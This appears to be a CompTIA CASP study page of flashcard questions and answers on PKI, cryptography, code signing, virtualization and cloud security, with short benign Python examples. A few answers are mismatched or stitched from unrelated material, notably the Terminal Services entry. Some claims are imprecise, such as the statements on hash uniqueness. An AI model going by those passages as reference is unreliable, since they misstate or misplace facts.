Security: If you use one certificate and private key on several web sites and private servers, it only takes one server to be compromised for all of the others to be rendered vulnerable. Mobile Device Compatibility: Some mobile device operating systems, including Windows Mobile 5, don’t understand the wildcard character (*) and are unable to use a wildcard certificate.
Common Use of PKI and its Three Main Categories
The most common use of PKI is server identification certificates. SSL requires a PKI certificate on the server to verify its identity in a trusted manner to the client; every HTTPS web server connection uses SSL and as such uses PKI. This overview concentrates on client-side applications of PKI, which use end-user PKI certificates instead of server certificates. Client-side applications of PKI fall into three categories. What are these categories?
Show answer and Breakdown
Answer:
- Authentication
- Digital signatures
- Encryption
The Most Popular PKI Applications
What are the most popular PKI applications in academia?
Show answer and Breakdown
Answer:
Authentication:
- Web applications
- Portals
- Student information systems
- Library online journals
- Network appliances
- VPN concentrators
- Firewalls
- Wireless access points
Digital signatures:
- S/MIME secure email (sign individual emails)
- Electronic document processing
- Signing XML forms
- Signing electronic documents
- Paperless authorization processes
- Instant messaging (sign each message)
Encryption:
- S/MIME secure email (encrypt individual emails)
- Instant messaging (encrypt each message)
Implications of Cryptographic Methods and Design on Privacy
Privacy and the confidentiality of personal information are essential values. Unfortunately, privacy is becoming more vulnerable within open and private networks, as their designs didn’t place confidentiality at the top of the list. Cryptography addresses these issues by offering privacy-enhancing technologies. How does cryptography play a role in personal privacy?
Show answer and Breakdown
Answer:
Efficient cryptography in a network environment helps safeguard the privacy of personal information and the integrity of confidential information. Forgoing cryptography on unsecured networks not only compromises the data, it jeopardizes critical elements such as public safety and national security. In some cases, where national law calls for preserving confidentiality or protecting critical infrastructures, governments may require the use of cryptography of adequate strength. Additionally, the use of cryptography to preserve data integrity in electronic transactions can also have an impact on privacy. Performing transactions through networks creates a data surge in which large amounts of information can be easily and cheaply stored, analyzed, and recycled. When transactions require proof of identity, the transactional data will leave very specific and indisputable trails of an individual’s commercial activity, and can paint a picture of private, non-commercial activities such as political associations, participation in online forums, and access to various types of information in online libraries or other databases. The key certification process also impacts privacy, in that data can be gathered when a certification authority binds an individual to a key pair.
How Privacy Should be Performed to Allow Lawful, Authorized Access
If authorized, lawful access is to be protected, how that should be achieved is unclear. Governments are trying different tactics and continue to look for creative solutions from industry. What are the primary methods?
Show answer and Breakdown
Answer:
One approach that would appeal to both users and authorities of the legal system would entail using a key management system in which a copy of the private cryptographic key used for confidentiality is “stored” with a “trusted third party” (TTP). Other methods would allow authorized third-party access to the plaintext of encrypted data; some could also be used to recover data when keys are lost. It’s critical to understand the distinction between keys used for the purposes of confidentiality and keys used for other purposes: keys used for authentication, data integrity verification, and non-repudiation would not be subject to the same kinds of lawful access by third parties.
Description and Implications of Transport Encryption
It is necessary to understand transport encryption for the CompTIA CASP certification exam. Transport encryption (“data-in-transit”) protects the file as it’s transmitted over protocols such as FTPS (SSL), SFTP (SSH), and HTTPS. Leading solutions use encryption strengths up to 256-bit. File encryption (“data-at-rest”) encrypts an individual file so that, in the event it makes its way to an unauthorized party, they cannot access or see the contents. PGP is commonly used to encrypt files. Using both together offers a double layer of protection: transport encryption safeguards files as they’re transferred, and PGP protects the file itself after it has been moved and sits on a server, laptop, USB drive, or smartphone. Make certain your organization is no longer using the FTP protocol for sending any type of confidential, private, or sensitive information. What else is important?
Show answer and Breakdown
Answer:
For all the accomplishment of FTP still functioning after 40 years, it offers neither encryption nor guaranteed delivery. Also, FTP servers scattered throughout your organization lack the visibility, management, and enforcement capabilities that modern Managed File Transfer solutions provide. Some transports do not offer adaptability in the degree of protection they provide: SSL security always provides both encryption and signing, and there is no way to throttle that security back, so the transport protection level knob is ignored. Windows security does permit throttling the protection level. If the service terminology cites signing only, you are using TCP with Windows security, and the transport protection level is set to signing only as well, so everything aligns for you to get signing only.
Transport Encryption vs File Encryption
What is the difference between Transport Encryption and File Encryption?
Show answer and Breakdown
Answer:
Transport encryption safeguards the file as it moves over protocols such as FTPS (SSL), SFTP (SSH), and HTTPS; leading solutions use encryption strengths up to 256-bit. File encryption protects the file itself: Pretty Good Privacy (PGP), a data encryption and decryption program that provides cryptographic privacy and authentication for data communication, is commonly used to encrypt files.
What are Digital Signatures?
What are Digital Signatures?
Show answer and Breakdown
Answer:
Digital signatures are a form of public key cryptography. A digital signature is an electronic signature, a form of ID for the person signing a document. It also contains data about the signatory and can be used to verify the identity of the sender of a message.
The Algorithms of Digital Signature Guidelines
Digital signature guidelines contain three algorithms, what are they?
Show answer and Breakdown
Answer:
- Key generation algorithm: generates a random key pair.
- Signing algorithm: generates a digital signature.
- Signature verifying algorithm: verifies the digital signature.
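The three algorithms map directly onto code. A sketch using the third-party `cryptography` package and an Ed25519 key (the library and scheme are assumptions for illustration; any signature scheme has the same three steps):

```python
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# 1. Key generation: produce a random key pair.
private_key = Ed25519PrivateKey.generate()
public_key = private_key.public_key()

message = b"I approve this document."

# 2. Signing: only the private key can produce the signature.
signature = private_key.sign(message)

# 3. Verification: anyone holding the public key can check it.
try:
    public_key.verify(signature, message)
    print("signature valid")
except InvalidSignature:
    print("signature invalid")
```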
Hashing Explained
What is Hashing and the role it plays in encryption?
Show answer and Breakdown
Answer:
Hashing is a method of deriving a unique, fixed-length mathematical fingerprint (hash) of a plaintext message. Hashes are also known as digests, and hashing is a one-way operation: recovering plaintext content from a hash is technically labeled “computationally infeasible”, meaning it would take an exorbitant amount of time to achieve. Digests produced by a given algorithm are all the same length, no matter the length of the plaintext. For example, the MD5 hashing algorithm creates 128-bit digests whether you calculate the hash of a one-character file or a 10 MB JPEG image. No two digests should be alike: changing any part of the plaintext creates a significant change in the digest (often many bits’ worth of change).
What is Code Signing and What is its Role in Security?
What is Code Signing and how does it play a role in security?
Show answer and Breakdown
Answer:
Code signing is the method of digitally signing applicable scripts to verify the software author and affirm the code has not been modified or corrupted since it was signed by use of a cryptographic hash. There are several advantages to code signing. The primary value of code signing is it provides a layer of security when used. Nearly all code signing techniques will support digital signature mechanisms to confirm the identity of the author or build system, and a checksum to validate the authentication of an object and that it hasn’t been modified. It can also be used to provide versioning information about an object or to store other metadata about an object.
How Does Code Signing Provide Security?
Many code signing mechanisms will offer a method to sign the code using private and public key systems, similar to the process employed by SSL or SSH. In situations where large amounts of content are distributed, code signing is particularly helpful where the origins of a specified piece of code may not be apparent, for example Java applets, ActiveX controls, and other active Web and browser scripting code. What is another use?
Show answer and Breakdown
Answer:
Another significant use is sending updates and patches to existing software. Most Linux distributions, as well as both Apple Mac OS X and Microsoft Windows update their services with code signing to protect from malicious distribution using the patch system.
Trusted Identification using a Certificate Authority (CA)
With code signing, the public key used should be traceable to a trusted root authority, preferably using a secure public key infrastructure (PKI). This does not guarantee that the code itself can be trusted, only that it originates from the stated source (or, more explicitly, from a particular private key). Given the above, what is the role of a Certificate Authority (CA)?
Show answer and Breakdown
Answer:
A certificate authority offers a root trust level and can apply trust to others by proxy. If a user receives and accepts one of the certificate authorities as a trusted source and receives an executable signed with a key produced by that CA, they can then decide to trust the executable by proxy.
Alternatives to Certificate Authorities
What other methods could one use besides assigning certificate authorities?
Show answer and Breakdown
Answer:
Developers can also choose to supply their own self-generated key. Here the user would need to acquire the public key from the developer to authenticate the object. Code signing methods will often store the public key inside the signature. Some software frameworks and OSs that check the code’s signature before execution will give the user the option to trust that developer after the first run. An application developer can provide a similar method by including the public keys with the installer.
Problems with Code Signing
The primary problem with code signing is that it can be corrupted, but how?
Show answer and Breakdown
Answer:
Users can be misled into executing unsigned code, or using code that refuses to validate, and the system is only rendered secure as long as the private key remains private.
Implementations of PKI
IBM’s Lotus Notes has had PKI signing of code from Release 1, and both client and server software have execution control lists to control what levels of access to data, environment, and file system are permitted for given users…
Show answer and Breakdown
Answer:
Individual design elements such as scripts, actions and agents, are signed using the editor’s ID file, which includes both the editor’s and the domain’s public keys. Core templates such as the mail template are signed with a dedicated ID held by the Lotus template development team.
What is Non-Repudiation?
Non-repudiation is a security technique used to confirm data delivery. It provides acknowledgement to the sender of data and verifies the sender’s identity to the recipient, so neither can refute the data at a future juncture. Non-repudiation is achieved through digital signatures, and affirms that the information being sent has been electronically signed by the purported sender. It also…
Show answer and Breakdown
Answer:
verifies the sender’s signature since digital signatures can only be produced by one person. Non-repudiation is used to refer to an interaction where the claimed producer of a statement will be unable to successfully challenge the validity of the statement. This term is frequently used in legal situations where validity of a signature is being challenged. In these cases, the validity is being “repudiated”. For e-commerce and other electronic transactions, all parties involved must be confident that the transaction is secure.
What is Entropy?
Entropy is the randomness gathered by an operating system or application for use in cryptography or other methods that necessitate random data. More:
Show answer and Breakdown
Answer:
This randomness is often gathered from hardware sources, or specially provided randomness generators.
Role of Pseudo Random Number Generation in Security
A pseudorandom number generator (PRNG) is also known as a deterministic random bit generator (DRBG). It is an algorithm for generating a sequence of numbers that approximates the properties of random numbers. This sequence is not inherently random as it’s based on a small set of initial values called the PRNG’s state, which contains…
Show answer and Breakdown
Answer:
a truly random seed. Though sequences that are seemingly more random can be produced using hardware random number generators, pseudorandom numbers are an important technique for their speed of generation and their reproducibility, and are essential in applications such as simulations, cryptography, and procedural generation. A pseudorandom generator is an easily computed method that extends a short random string into a much longer string that appears random to any efficient adversary. It can also be used to construct a private key cryptosystem that’s secure against a plaintext attack. There are few natural examples of functions that are pseudorandom generators. On the other hand, there are several natural examples of another basic primitive: the one-way function. A function is one-way if it is easy to compute, but difficult for an adversary to invert on average.
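A short demonstration of the deterministic behavior described above; note the contrast between a seeded PRNG (reproducible, good for simulations) and an OS entropy source (unpredictable, required for keys):

```python
import random
import secrets

# Two PRNGs seeded with the same state emit the same "random" sequence.
a = random.Random(1234)
b = random.Random(1234)
print([a.randint(0, 99) for _ in range(5)])  # identical output...
print([b.randint(0, 99) for _ in range(5)])  # ...because the seed determines all

# For cryptographic keys, draw unpredictable bytes from the OS instead.
print(secrets.token_bytes(16))
```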
What is Perfect Forward Secrecy
What is Perfect Forward Secrecy? Perfect forward secrecy (or PFS) is the property that ensures that a session key derived from a set of long-term public and private keys will not be compromised if one of the (long-term) private keys is compromised in the future. Forward secrecy has been used…
Show answer and Breakdown
Answer:
interchangeably with perfect forward secrecy, since the term perfect has been debatable in this context. However, at least one detail differentiates perfect forward secrecy from forward secrecy with the additional property: that an agreed key will not be compromised even if agreed keys derived from the same long-term keying material in a subsequent run are compromised.
Confusion and Diffusion and Their Role in Cryptography
Confusion refers to making the correlation between the key and the ciphertext as complex and intricate as possible; diffusion refers to the property that the redundancy in the statistics of the plaintext is “dissipated” in the statistics of the ciphertext. Or, the nonuniformity in the distribution of the individual letters in the plaintext should be redistributed into the non-uniformity in the distribution of much larger elements of the ciphertext, which is more difficult to detect. Find out the roles each play in Cryptography…
Show answer and Breakdown
Answer:
In cryptography, confusion and diffusion are two elements of the operation of a secure cipher. Diffusion means that output bits should depend on the input bits in a very complex way: in a cipher with effective diffusion, if one bit of the plaintext is altered, the ciphertext should change completely and unpredictably. In general, flipping a single input bit should change each output bit with probability one half. One of the objectives of confusion is to make it difficult to find the key even if an attacker has many plaintext and ciphertext pairs created with the same key. Therefore, each bit of the ciphertext should depend on the entire key, and in different ways on different bits of the key; changing one bit of the key should completely change the ciphertext.
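The avalanche behavior that diffusion demands can be measured. A small sketch using SHA-256 as a stand-in (a hash, not a cipher, but it exhibits the same property): flip one input bit and count how many of the 256 output bits change.

```python
import hashlib

def bit_string(data: bytes) -> str:
    return "".join(f"{byte:08b}" for byte in data)

message = bytearray(b"attack at dawn")
digest_before = hashlib.sha256(bytes(message)).digest()

message[0] ^= 0b00000001  # flip a single bit of the input
digest_after = hashlib.sha256(bytes(message)).digest()

# With good diffusion, roughly half of the output bits should change.
changed = sum(x != y for x, y in zip(bit_string(digest_before),
                                     bit_string(digest_after)))
print(f"{changed} of 256 output bits changed")
```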
Advantages and Disadvantages of Virtualization
Virtualization offers several advantages to data centers. Implementing virtualization in your data center supports consolidation of your physical servers, reduces hardware costs, and assists network management. Virtualization technology lets a virtual machine run programs and software as if it were a real machine, and allows multiple virtual machines to run on a single hardware platform, each running its own operating system in the virtualized environment. Some benefits of virtualization technology:
Show answer and Breakdown
Answer:
- It lowers hardware maintenance cost.
- It enhances security by minimizing the access points in any virtualized environment.
- It helps maintain the integrity of the virtualized environment: an issue with one virtual machine does not affect the others.
Types of Virtualization Technology
The different types of virtualization technology include:
- Platform virtualization technology: used to separate an operating system from the core platform assets.
- Full virtualization technology: used to replace sensitive instructions with translated versions.
- Hardware-assisted virtualization technology: the CPU itself traps sensitive commands.
- Partial virtualization technology: used for certain apps that are not supported by the operating system.
- Para-virtualization: provides a software interface to VMs that is a near-replica of the interface of the original hardware.
- Operating system-level virtualization technology: the operating system allows multiple isolated user-space instances to run.
- Application virtualization technology: the hosting of individual apps on different hardware and software.
- Database virtualization technology: used to divide the database layer into segments defined between the storage and application layers of the application stack.
See the rest…
Show answer and Breakdown
Answer:
- Portable application virtualization technology: a software program that runs from a removable storage device.
- Cross-platform virtualization technology: allows software compiled for a particular CPU and operating system to run on dissimilar CPUs and/or operating systems.
- Storage virtualization technology: the process of abstracting logical storage from physical storage.
- Memory virtualization technology: used to aggregate RAM resources from across networks.
- Network virtualization technology: the process of structuring a virtualized network addressing space.
- Desktop virtualization technology: the remote hosting and management of a computer desktop.
- Data virtualization technology: used to present data as a conceptual layer, separate from the original database systems, structures, and storage.
The Security Disadvantages of Virtualization
The known security disadvantages of virtualization technology include:
Show answer and Breakdown
Answer:
It creates a single point of failure.
It requires powerful host machines.
It can lower performance.
Application virtualization is not always feasible.
It can lead to resource contention.
It can increase the mean time to recovery when failures occur.
It is susceptible to attacks such as DoS, timing attacks, and VM escape.
The Security Advantages of Virtualization
The known security advantages of virtualization include:
Show answer and Breakdown
Answer:
It provides an additional layer of security.
It supports strong encapsulation of errors.
It enhances intrusion detection through introspection.
It limits the exposure of vulnerable software.
It increases flexibility for discovery and testing.
It increases efficiency for fault-tolerant computing through rollback and snapshot features.
What is Storage Virtualization?
Storage virtualization is a method used in a storage area network (SAN) for the…
Show answer and Breakdown
Answer:
management of storage devices. It helps the storage administrator perform backup, archiving, and recovery in a smooth and timely way by hiding the complexity of the SAN.
What is Distributed Computing?
Distributed computing is a field of computer science devoted to distributed systems. In distributed computing, a problem is split into many tasks, each of which is solved by one computer. A distributed system is made up of…
Show answer and Breakdown
Answer:
numerous autonomous computers that interact through a computer network. The term also refers to the use of distributed systems to solve computational problems. The computers communicate with each other to achieve a common goal.
What is Workspace Virtualization?
A deeper look into workspace virtualization.
Workspace virtualization is the process whereby applications are distributed to client computers via… Click to read more…
Show answer and Breakdown
Answer:
application virtualization; it integrates major applications into one complete workspace. It helps condense or encapsulate a computing workspace. At the basic level, the workspace contains everything above the operating system kernel, such as applications, data, settings, and any other non-privileged operating system subsystems needed to run a functional desktop computing environment.
What is Server Virtualization?
A deeper look into server virtualization.
Server virtualization is a mechanism for dividing a physical server into many virtual servers. These virtual servers can run their own operating system and applications, and can thus function as an individual server. The features of server virtualization include:
Show answer and Breakdown
Answer:
Reduces the number of physical servers
Reduces TCO
Enhances availability and business continuity
Raises performance for development and test environments
Further Benefits of Virtualization
More benefits of virtualization.
Other benefits of virtualization that you must be aware of include:
Show answer and Breakdown
Answer:
Virtualization improves the utilization of resources. It provides workload balancing; Xen, for example, supports live migration of virtual machines from one host to another. It provides dynamic fault tolerance against software malfunction (through rapid bootstrapping or rebooting). It provides hardware fault tolerance (through migration of a virtual machine to other hardware). It supports secure separation of virtual operating systems. It supports legacy software as well as new OS instances on the same computer. Virtualization also has benefits for development (including development of operating systems): running the new system as a guest avoids rebooting the physical computer whenever a bug occurs.
Securing a Virtualization Administrative Network
How to secure a Virtualization Administrative Network.
A virtualization administrative network concentrates access to the management tools, so a compromise of that network could lead to deeper access, whether through…
Show answer and Breakdown
Answer:
the Virtual Infrastructure Client, the VI SDK, or other tools. The other aspect of working in a virtualization administrative network is implementing the appropriate systems within that network.
Securing virtual environments, appliances and equipment
You must have a firm understanding of these common security problems when operating in virtual environments.
The following are critical issues that one must be aware of regarding security in a virtual environment:
Show answer and Breakdown
Answer:
Definitional issues concerning vulnerabilities of a virtual environment and, essentially, the viable threats to that environment. The administration of applications and operating systems within virtual machines. The use of a virtual administrative network to manage virtual hosts.

To strengthen the security of a virtual environment, define the scope of the virtual environment and review the security threats at the OS, application, and network levels. The objective of virtualization controls is to secure the entire virtual environment, not just a hypervisor or management component in isolation.

Virtual environment semantics: Uniform definitions of the security components of virtualization are essential. If your definition of a secure virtual environment deviates from prevailing standard definitions, it can create conflicting security recommendations. Two main issues need to be clearly defined in virtualization: one, what comprises a virtual environment? Two, what is considered hostile to that environment?

The other issue to be aware of is escaping the VM to reach the management appliance of the hypervisor. This could be accomplished over the network if the VMs can reach the management appliance. However, access to the management appliance does not necessarily grant access to the hypervisor. For example, VMware ESXi runs its management appliance within the hypervisor, while on VMware ESX the management appliance runs as a separate entity from the hypervisor.
What is a VLAN and How Does it Improve Security?
Explain a VLAN and why it makes a network more secure.
Nodes on the same physical segment can be made to work together as if they were operating on separate segments, or…
Show answer and Breakdown
Answer:
various physical network segments can be designed to appear as if they were on the same segment. Technically, a VLAN is a specific broadcast domain within a larger network. VLANs enhance security by grouping users into smaller groups, which creates an added obstacle for potential attackers: instead of obtaining direct access to the network, the attacker must also obtain access to the specific virtual LAN.
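As a rough illustration of how VLAN membership is expressed on the wire, the sketch below builds an 802.1Q-tagged frame in Python, assuming the third-party scapy library is installed; the VLAN ID, addresses, and interface name are placeholders:

    from scapy.all import Ether, Dot1Q, IP, ICMP, sendp

    # Build a frame tagged for VLAN 10. A switch port that is not a
    # member of VLAN 10 should never deliver this frame to its hosts.
    frame = (Ether(dst="ff:ff:ff:ff:ff:ff") /
             Dot1Q(vlan=10) /
             IP(dst="192.0.2.1") /
             ICMP())

    sendp(frame, iface="eth0")  # placeholder interface name; requires root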
Which Virtual Networks Should Connect to the VMs?
Know which virtual networks you should not connect your VMs to unless approved otherwise.
Unless specifically approved by the security organization, VMs should not reside on the following virtual networks connected to the VMware ESX host:
Show answer and Breakdown
Answer:
Storage network
VMotion/SVMotion network
VMware Consolidated Backup network
Management network
Best Practices to Managing the Guest OS
What you need to know about managing the guest OS.
Management of the guest OS does not require access to VM management tools; specifically, it does not require access to the remote console. In many cases…
Show answer and Breakdown
Answer:
it requires access to a console, but that can be granted using tools like the Remote Desktop Protocol (RDP), Virtual Network Computing (VNC), or Secure Shell (SSH). Access to the tools that administer the virtual environment, like the VMware Virtual Infrastructure Client (VIC), should be restricted to virtualization administrators.
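For instance, granting a guest OS administrator SSH access (rather than remote-console access) could look like the following sketch, assuming the third-party paramiko library; the hostname, username, and key path are placeholders:

    import paramiko

    client = paramiko.SSHClient()
    client.load_system_host_keys()
    client.set_missing_host_key_policy(paramiko.RejectPolicy())  # refuse unknown host keys

    client.connect("vm-guest.example.com",          # placeholder guest hostname
                   username="osadmin",
                   key_filename="/home/osadmin/.ssh/id_ed25519")

    stdin, stdout, stderr = client.exec_command("uptime")
    print(stdout.read().decode())
    client.close()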
The First Step in Securing a Virtual Network
A Must Know!
What is the first step in securing the virtual network?
Show answer and Breakdown
Answer:
The first step in securing the virtual network is to establish the protocols and procedures that must be followed.
The Second Step in Securing Your Virtual Network – Software Firewalls
The second step in securing your virtual network and why it is the second most important element of security in a virtual environment.
Installing a software firewall is the second step in securing a virtual environment. Why?
Show answer and Breakdown
Answer:
Adding a software firewall is the next security measure to implement. With several virtual machine environments operating on a single hardware system, there is no effective way to monitor the traffic between the different virtual machines, so without a firewall malware can run unchecked.
Anti-Virus Software, the Third Step in Securing a Virtual Environment
Why anti-virus software is the third step in securing a virtual environment and how to properly implement it.
Because virtual machines are set up to be self-contained systems, some kind of anti-virus software is required to protect these systems. Even if an antivirus program is installed…
Show answer and Breakdown
Answer:
on the host machine, it won't extend to the virtual machine environments. Anti-virus software scans files and folders on the local host machine but has no way of scanning the items contained in the virtual environments. That is why anti-virus software must be installed in each virtual machine environment.
Physically Securing your Virtual Machines
Learn how to physically secure your virtual machine environment.
Because the introduction of virtual machine environments offers mobility to operating systems, they’re no longer attached…
Show answer and Breakdown
Answer:
to a particular hardware system, making it easy for them to be removed or copied. With the availability of large thumb drives (up to 64 GB), it would be easy to steal a virtual environment. It's critical to lock down the physical installation of virtual servers: to secure the virtual machines, store them in a restricted-access area.
A Deep Dive into VMware Workstation
Make sure you have a firm understanding of VMware Workstation; let's dive in deeper.
VMware Workstation, from VMware (a division of EMC Corporation), allows users to set up multiple x86 and x86-64 virtual machines (VMs) and use one or more of these virtual machines simultaneously with the hosting operating system. Each VM can run its own guest operating system, including Windows, Linux, BSD variants, and others. Essentially, VMware Workstation allows…
Show answer and Breakdown
Answer:
one machine to run several operating systems at once, whereas other VMware products assist in the management or migration of VMware virtual machines across multiple physical host machines. VMware Workstation is sold commercially; VMware Player is a similar program with fewer features, supplied free of charge. VMware Workstation supports connecting existing host network adapters, CD-ROM devices, hard disk drives, and USB devices to the guest, and can emulate some hardware. For example, it can mount an ISO file as a CD-ROM and .vmdk files as hard disks, and it can configure its network adapter driver to use network address translation (NAT) through the host machine rather than bridging through it. Multiple successive snapshots of an operating system running under VMware Workstation can be taken, and the virtual machine can be returned to the state it was in when any snapshot was saved.
Vulnerabilities associated with a single platform hosting multiple companies’ virtual machines
Let's look closely at the vulnerabilities associated with a single platform hosting multiple companies' virtual machines.
With virtual platforms standing in for real hardware, they can produce uniquely different and more dynamic usage models than are found in traditional computing environments. This can compromise…
Show answer and Breakdown
Answer:
the security architecture of many organizations, which often assumes expected and controlled change in the number of hosts, host configuration, host location, and so on. Also, some of the beneficial mechanisms found within virtual machines can have unpredictable and harmful interactions with existing security mechanisms.
The Security Burden of Scalability of Virtual Environments
The scalability factor of virtual environments poses a serious security threat. How?
A virtual machine monitor (VMM) offers a layer of software between the operating system and hardware of a machine to produce the illusion of one or more virtual machines (VMs) on a single physical platform. A virtual machine entirely contains the…
Show answer and Breakdown
Answer:
state of the guest operating system running inside it. Encapsulated machine state can be copied and shared over networks and removable media like a standard file. It can also appear on existing networks and requires configuration and management like a physical machine. VM state can be changed like a physical machine, by running over time, or like a file, through direct modification.

Scaling: Growth in physical machines is ultimately limited by setup time and an organization's budget. In contrast, creating a new VM is as simple as copying a file. Users often keep numerous special-purpose VMs for testing or demonstration purposes, called sandbox VMs, to test new applications or to run specific applications not offered by their regular OS. This means the total number of VMs in an organization can multiply considerably, limited mainly by available storage. This rapid scaling in virtual environments can burden the security systems of an organization.
Key Cloud Computing Characteristics
Secure use of cloud computing requires an understanding of certain key characteristics.
Cloud computing is a pay-per-use model for providing available, convenient, on-demand network access to a shared pool of configurable computing resources that can be rapidly provisioned and released with minimal management effort or service provider interaction. This cloud model promotes availability and consists of five key characteristics, three delivery models, and four deployment models. The five key cloud characteristics include:
Show answer and Breakdown
Answer:
5 Key Cloud Characteristics:
On-demand self-service
Ubiquitous network access
Location-independent resource pooling
Rapid elasticity
Pay per use
The Three Cloud Computing Delivery Models
There are three key cloud computing delivery models.
The three cloud delivery models. The first two are:
Cloud Software as a Service (SaaS): use the provider's applications over a network.
Cloud Platform as a Service (PaaS): deploy customer-created applications to a cloud.
What is the third model? Click to view…
Show answer and Breakdown
Answer:
Cloud Infrastructure as a Service (IaaS): rent processing, storage, network capacity, and other fundamental computing resources.
The Four Cloud Deployment Models
It is imperative to know the four cloud computing deployment models.
The first two cloud computing deployment models include:
Private cloud: enterprise owned or leased.
Community cloud: shared infrastructure for a specific community.
What are the other two? Click to view…
Show answer and Breakdown
Answer:
Public cloud: sold to the public; mega-scale infrastructure.
Hybrid cloud: a composition of two or more clouds.
The Primary Advantages of Cloud Computing
What are the primary advantages leveraged by cloud computing?
Cloud computing often leverages:
Massive scale
Virtualization
Free software
Click to view the others…
Show answer and Breakdown
Answer:
Autonomic computing
Multi-tenancy
Geographically distributed systems
Advanced security technologies
Service-oriented software
Provisioning in Cloud Computing
You must understand the concept of provisioning in cloud computing.
Provisioning covers the system from end to end: OS, hardware, storage, application, network, and database all need to be self-service provisioned. Provisioning is…
Show answer and Breakdown
Answer:
dynamic and self-service: provisioning applications entails deploying them to your cloud infrastructure with a few clicks of the mouse. So, when moving to the cloud, application provisioning is simplified, since there are not hundreds of client machines to deploy at once.
De-provisioning in Cloud Computing
Understand the concept and need for de-provisioning in cloud computing.
Public cloud providers apply multi-tenancy to optimize server workloads and reduce costs. Multi-tenancy shares server space among organizations, so it's important to know…
Show answer and Breakdown
Answer:
what security mechanisms your cloud provider has in place. Depending on the sensitivity of the data, encryption may need to be used as well. De-provisioning will become more challenging as password verification methods become more sophisticated: federated identity management schemes will allow users to log on to multiple clouds, and that will make de-provisioning much trickier.
Concerns Regarding Data Remnants
Why are data remnants a concern in cloud computing?
In a cloud infrastructure, data is often moved to make the best use of resources, which means organizations can't always track their data. This is especially true in the public cloud. To keep costs down, an organization wants a service provider to optimize resource usage. Data remnants are a topic of concern because…
Show answer and Breakdown
Answer:
data storage service providers generally do not provide transparency into how resources are shifted to accomplish this. If data is moved, residual data may linger that an unauthorized user could possibly access.
Vulnerabilities with co-mingling of hosts with different security requirements
Determine the vulnerabilities with co-mingling of hosts with different security requirements.
Running VMware in an environment that involves integrated networks causes data commingling, which is usually harmless but can be potentially harmful if…
Show answer and Breakdown
Answer:
the wrong data is commingled. Network convergence happens because people typically don't use 100% of a 10 Gigabit Ethernet network's bandwidth; most don't even use the full bandwidth of a 1 Gigabit Ethernet link. The goal is to use the unused bandwidth for other networking purposes, as laying new cable is often not possible (for example, due to a lack of network interface cards) and is costly as well as time-consuming.
Breaking Out and Interacting with the Hypervisor – VMEscape
Let's dive deep into the process of breaking out and interacting with the hypervisor, which is known as “VMEscape”.
Normally, virtual machines are encapsulated, isolated environments. The operating systems running inside the virtual machine should not know they are virtualized, and there should be no way to interact with the parent hypervisor. The process of breaking out and interacting with the hypervisor is called a “VM escape”. Because the hypervisor administers the execution of all of the virtual machines, an attacker who gains access to the hypervisor can assume control over every other virtual machine running on the host. Because the hypervisor is…
Show answer and Breakdown
Answer:
situated between the physical hardware and the guest operating system, an attacker who escapes can bypass the security controls in place on the virtual machine. Virtual machines are designed to run in self-contained, closed-off environments on the host. Each VM should function as a separate system, isolated from the host operating system and any other VMs running on the same machine. The hypervisor is the go-between for the host operating system and the virtual machines; it controls the host processor and allocates resources as required to each guest operating system. To minimize vulnerability to VM escape:
Keep virtual machine software patched.
Install only the resource-sharing features that are required.
Keep software installations to a minimum, as each program carries its own vulnerabilities.
Improve Virtualization Security with Privilege Elevation
How does privilege elevation improve security in a virtual environment?
Privilege elevation expands user rights. All users working on clients running Windows 7 have the rights of standard users. To perform administrative work, administrative privileges are required, which means elevating a user's rights from standard user to administrative user. This is a security measure…
Show answer and Breakdown
Answer:
intended to block administrative changes to a computer by a malicious application or a hacker.
What is Virtual Desktop Infrastructure (VDI)?
Define Virtual Desktop Infrastructure (VDI).
Virtual Desktop Infrastructure (VDI) is used to virtualize the desktop environment, deploying enterprise-class control and increasing manageability while sustaining a familiar end-user environment. It virtualizes desktop images that are distributed from a centralized hosting server, giving the end user a virtual PC that replicates the function of their current PC. It is used to consolidate the number of servers that support desktops, with these advantages: click to view…
Show answer and Breakdown
Answer:
Green solution
Cost efficiency
Improved manageability
Central management of files and user profiles
What is Terminal Services?
Define terminal services.
Terminal Services is a multisession environment that extends access to Windows-based programs running on a server to remote computers. When a user runs a program on a Terminal Server, the application executes on the server, and only the keyboard, mouse, and display information travels over the network. Distributed computing is an area of computer science that examines…
Show answer and Breakdown
Answer:
distributed systems. In a virtualized environment, any issue with the underlying drive impacts all the VMs hosted on that drive. PCI requirements are explicit: when different sites are commingled, they are all required to be PCI compliant.
What is Storage Virtualization?
Define storage virtualization.
Storage virtualization is a concept and term used within computer science. Specifically, storage systems may use virtualization techniques to improve functionality and provide more advanced features within the storage system. A storage system is also referred to as a storage array, disk array, or filer. Certain software and hardware, along with…
Show answer and Breakdown
Answer:
disk drives are utilized by storage systems to provide fast and reliable storage for computing and data processing. Storage systems are complex in structure and are often viewed as specialized computers designed to provide storage capacity along with advanced data protection features. Disk drives are only one component of a storage system, along with hardware and specialized software embedded within the system. Storage systems can provide either block accessed storage, or file accessed storage. Block access is typically deployed over Fibre Channel, iSCSI, SAS, FICON or other protocols. File access is often done through NFS or CIFS protocols.
Two Types of Storage Virtualization
What are the two types of storage virtualization?
Within the context of a storage system, there are two basic types of virtualization that can occur. What are they, and provide a definition:
Show answer and Breakdown
Answer:
Block virtualization: the abstraction of logical storage from physical storage so that data can be accessed without regard to physical storage or heterogeneous structure. This separation gives the administrators of the storage system increased flexibility in how they manage storage for end users.
File virtualization: addresses NAS challenges by removing the dependencies between data accessed at the file level and the location where the files are physically stored. This allows optimization of storage use, server consolidation, and smooth file migrations.
What is Network Attached Storage?
Define Network Attached Storage (NAS).
Network Attached Storage (NAS) is hard disk storage that is set up with its own network address rather than being attached directly to the computer that serves a network's workstation users. An elaborate operating system isn't…
Show answer and Breakdown
Answer:
required on a NAS device, so a basic operating system is used. NAS provides both storage and a file system. A network-attached storage (NAS) device is a server that supports file sharing; the file server runs on a dedicated device connected to the network. These devices are often based on Linux or UNIX derivatives.
What are the Primary Benefits of Network Attached Storage (NAS)?
Determine the main benefits of NAS.
The main benefits of a NAS device are: Click below to view…
Show answer and Breakdown
Answer:
It is easy to install, configure, and manage using a web browser.
It allows Windows, UNIX/Linux, Mac OS, and Novell clients to use the same storage and access shared data, because it can interact with the network using a variety of protocols, such as TCP/IP, IPX/SPX, NetBEUI, or AppleTalk.
It does not need to be located within the server; it can be placed anywhere on the LAN.
It allows you to add more hard disk storage space to a network without shutting the network down for maintenance and upgrades.
